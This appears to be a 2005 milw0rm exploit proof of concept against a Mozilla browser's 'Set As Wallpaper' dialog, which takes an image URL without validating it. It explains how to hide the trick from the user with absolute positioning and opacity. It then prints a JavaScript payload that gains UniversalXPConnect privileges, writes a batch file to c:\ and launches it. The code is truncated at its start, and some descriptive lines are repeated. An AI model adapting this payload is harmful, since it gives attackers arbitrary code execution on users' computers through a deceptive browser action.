Firewalling - Proof-of-Concept
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter an attacker can easily fool the user to think he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests UniversalXPConnect rights, creates c:\booom.bat and launches the batch file that shows a directoy listing in a dos box (Windows only).
==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\
booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}'))
# milw0rm.com [2005-07-13]
By using absolute positioning and the moz-opacity filter an attacker can easily fool the user to think he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests UniversalXPConnect rights, creates c:\booom.bat and launches the batch file that shows a directoy listing in a dos box (Windows only).